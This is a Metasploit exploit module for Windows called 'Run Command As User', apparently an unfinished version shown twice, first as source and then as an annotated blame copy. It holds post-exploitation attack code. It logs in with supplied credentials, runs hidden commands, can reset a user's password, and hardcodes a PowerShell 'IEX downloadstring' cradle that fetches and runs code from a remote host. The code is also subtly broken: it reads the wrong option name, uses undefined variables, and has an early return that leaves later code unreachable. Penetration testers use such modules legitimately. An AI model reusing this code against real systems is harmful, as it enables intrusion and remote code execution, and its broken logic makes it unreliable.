metasploit-framework/modules/exploits/windows/local/run_as.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::Powershell
  include Msf::Post::Windows::Runas

  def initialize(info={})
    super(update_info(info,
      'Name'                 => "Windows Manage Run Command As User",
      'Description'          => %q{
        This module will login with the specified username/password and execute the
        supplied command as a hidden process. Output is not returned by default, by setting
        CMDOUT to false output will be redirected to a temp file and read back in to
        display.By setting advanced option SETPASS to true, it will reset the users
        password and then execute the command.
      },
      'License'              => MSF_LICENSE,
      'Platform'             => ['win'],
      'SessionTypes'         => ['meterpreter'],
      'Author'               => ['Kx499'],
      'Targets' => [ [ 'Universal', {} ] ],
      'DefaultTarget' => 0
    ))

    register_options(
      [
        OptString.new('DOMAIN', [true, 'Domain to login with' ]),
        OptString.new('USER', [true, 'Username to login with' ]),
        OptString.new('PASSWORD', [true, 'Password to login with' ]),
        OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)']),
        OptString.new('COMMAND_LINE', [true, 'Command line to execute (lpCommandLine)']),
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('CMDOUT', [true, 'Retrieve command output', false]),
        OptBool.new('SETPASS', [true, 'Reset password', false])
      ], self.class)
  end

  # Check if sufficient privileges are present for certain actions and run getprivs for system
  # If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You
  # need to migrate to a process that is running as
  # system. If you don't have privs, this exits script.
  def priv_check
    if is_system?
      privs = session.sys.config.getprivs
      if privs.include?("SeAssignPrimaryTokenPrivilege") and privs.include?("SeIncreaseQuotaPrivilege")
        @isadmin = false
        return true
      else
        return false
      end
    elsif is_admin?
      @isadmin = true
      return true
    else
      return false
    end
  end

  def reset_pass(user, password)
    cmd = "cmd.exe /c net user #{user} #{password}"
    r = cmd_exec(cmd)
    return r.include?("successfully")
  end

  def exploit
    fail_with(Exploit::Failure::BadConfig, "Must be a meterpreter session")  if session.sys.config.sysinfo.type != "meterpreter"

    # check/set vars
    cmdout = datastore["CMDOUT"]
    user = datastore["USER"]
    password = datastore["PASS"]
    application_name = datastore['APPLICATION_NAME']
    command_line = datastore["COMMAND_LINE"]
    domain = datastore['DOMAIN']

    cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)

    cmdstr = 'powershell.exe -C IEX ((new-object net.webclient).downloadstring(\'http://192.168.5.101:8080/x86\'))'

    if is_system?
      puts create_process_as_user(domain,
                             user,
                             password,
                             application_name,
                             command_line)
    else
      puts create_process_with_logon(domain,
                                     user,
                                     password,
                                     application_name,
                                     command_line)

      #print_error("Insufficient Privileges, either you are not Admin or system or you elevated")
      #print_error("privs to system and do not have sufficient privileges. If you elevated to")
      #print_error("system, migrate to a process that was started as system (srvhost.exe)")
      #return 0
    end

    return

    # Only process file if the process creation was successful, delete when done, give us info
    # about process
    if cs["return"]
      tmpout = ""
      if cmdout
        outfile = session.fs.file.new(outpath, "rb")
        until outfile.eof?
          tmpout << outfile.read
        end
        outfile.close
        c = session.sys.process.execute("cmd.exe /c del #{outpath}", nil, {'Hidden' => true})
        c.close
      end

      pi = cs["lpProcessInformation"].unpack("LLLL")
      print_status("Command Run: #{cmdstr}")
      print_status("Process Handle: #{pi[0]}")
      print_status("Thread Handle: #{pi[1]}")
      print_status("Process Id: #{pi[2]}")
      print_status("Thread Id: #{pi[3]}")
      print_line(tmpout)
    else
      print_error("#{cs["ErrorMessage"]}")
      return 0
    end
  end
end
Refactor to common module 2015-01-27 10:47:02 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit3 < Msf::Exploit::Local`
			`include Msf::Post::File`
			`include Msf::Post::Windows::Priv`
			`include Msf::Exploit::Powershell`
			`include Msf::Post::Windows::Runas`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Windows Manage Run Command As User",`
			`'Description' => %q{`
			`This module will login with the specified username/password and execute the`
			`supplied command as a hidden process. Output is not returned by default, by setting`
			`CMDOUT to false output will be redirected to a temp file and read back in to`
			`display.By setting advanced option SETPASS to true, it will reset the users`
			`password and then execute the command.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Platform' => ['win'],`
			`'SessionTypes' => ['meterpreter'],`
			`'Author' => ['Kx499'],`
			`'Targets' => [ [ 'Universal', {} ] ],`
			`'DefaultTarget' => 0`
			`))`

			`register_options(`
			`[`
			`OptString.new('DOMAIN', [true, 'Domain to login with' ]),`
			`OptString.new('USER', [true, 'Username to login with' ]),`
			`OptString.new('PASSWORD', [true, 'Password to login with' ]),`
			`OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)']),`
			`OptString.new('COMMAND_LINE', [true, 'Command line to execute (lpCommandLine)']),`
			`], self.class)`

			`register_advanced_options(`
			`[`
			`OptBool.new('CMDOUT', [true, 'Retrieve command output', false]),`
			`OptBool.new('SETPASS', [true, 'Reset password', false])`
			`], self.class)`
			`end`

			`# Check if sufficient privileges are present for certain actions and run getprivs for system`
			`# If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You`
			`# need to migrate to a process that is running as`
			`# system. If you don't have privs, this exits script.`
			`def priv_check`
			`if is_system?`
			`privs = session.sys.config.getprivs`
			`if privs.include?("SeAssignPrimaryTokenPrivilege") and privs.include?("SeIncreaseQuotaPrivilege")`
			`@isadmin = false`
			`return true`
			`else`
			`return false`
			`end`
			`elsif is_admin?`
			`@isadmin = true`
			`return true`
			`else`
			`return false`
			`end`
			`end`

			`def reset_pass(user, password)`
			`cmd = "cmd.exe /c net user #{user} #{password}"`
			`r = cmd_exec(cmd)`
			`return r.include?("successfully")`
			`end`

			`def exploit`
			`fail_with(Exploit::Failure::BadConfig, "Must be a meterpreter session") if session.sys.config.sysinfo.type != "meterpreter"`

			`# check/set vars`
			`cmdout = datastore["CMDOUT"]`
			`user = datastore["USER"]`
			`password = datastore["PASS"]`
			`application_name = datastore['APPLICATION_NAME']`
			`command_line = datastore["COMMAND_LINE"]`
			`domain = datastore['DOMAIN']`

			`cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)`

			`cmdstr = 'powershell.exe -C IEX ((new-object net.webclient).downloadstring(\'http://192.168.5.101:8080/x86\'))'`

			`if is_system?`
			`puts create_process_as_user(domain,`
			`user,`
			`password,`
			`application_name,`
			`command_line)`
			`else`
			`puts create_process_with_logon(domain,`
			`user,`
			`password,`
			`application_name,`
			`command_line)`

			`#print_error("Insufficient Privileges, either you are not Admin or system or you elevated")`
			`#print_error("privs to system and do not have sufficient privileges. If you elevated to")`
			`#print_error("system, migrate to a process that was started as system (srvhost.exe)")`
			`#return 0`
			`end`

			`return`

			`# Only process file if the process creation was successful, delete when done, give us info`
			`# about process`
			`if cs["return"]`
			`tmpout = ""`
			`if cmdout`
			`outfile = session.fs.file.new(outpath, "rb")`
			`until outfile.eof?`
			`tmpout << outfile.read`
			`end`
			`outfile.close`
			`c = session.sys.process.execute("cmd.exe /c del #{outpath}", nil, {'Hidden' => true})`
			`c.close`
			`end`

			`pi = cs["lpProcessInformation"].unpack("LLLL")`
			`print_status("Command Run: #{cmdstr}")`
			`print_status("Process Handle: #{pi[0]}")`
			`print_status("Thread Handle: #{pi[1]}")`
			`print_status("Process Id: #{pi[2]}")`
			`print_status("Thread Id: #{pi[3]}")`
			`print_line(tmpout)`
			`else`
			`print_error("#{cs["ErrorMessage"]}")`
			`return 0`
			`end`
			`end`
			`end`